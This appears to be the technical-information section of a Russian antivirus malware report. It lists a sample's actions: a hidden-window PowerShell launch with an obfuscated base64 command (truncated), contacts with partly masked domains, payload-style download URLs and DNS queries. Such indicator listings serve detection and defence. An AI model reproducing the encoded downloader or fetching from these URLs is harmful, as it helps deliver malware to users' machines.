Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADEAaABqADcAXwByAD0AKAAoACcARQAnACsAJwA5AGIAJwApACsAKAAnADcAdAAnACsAJwB4ACcAKQArACcAcwAnACkAOwAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFQARQBNAHAAXABXAG8AcgBEAF...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 3808
- 'te###sign.com':80
- 'xa####digital.com':80
- 'hu###omains.com':443
- 'li######.fischertrust.org':443
- 'cr####vityonline.fr':80
- 'ba#####cityjewel.com':443
- 'x1.#.lencr.org':80
- 'de##ine.com':443
- http://te###sign.com/stats/0W/
- http://xa####digital.com/condosdominicano.biz/50sWkJ/
- http://cr####vityonline.fr/aideadomicile-goderville/jcUzC/
- http://x1.#.lencr.org/
- 'hu###omains.com':443
- 'ba#####cityjewel.com':443
- 'de##ine.com':443
- DNS ASK te###sign.com
- DNS ASK vi##-all.ch
- DNS ASK xa####digital.com
- DNS ASK hu###omains.com
- DNS ASK li######.fischertrust.org
- DNS ASK cr####vityonline.fr
- DNS ASK ba#####cityjewel.com
- DNS ASK x1.#.lencr.org
- DNS ASK de##ine.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADEAaABqADcAXwByAD0AKAAoACcARQAnACsAJwA5AGIAJwApACsAKAAnADcAdAAnACsAJwB4ACcAKQArACcAcwAnACkAOwAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFQARQBNAHAAXABXAG8AcgBEAF... (со скрытым окном)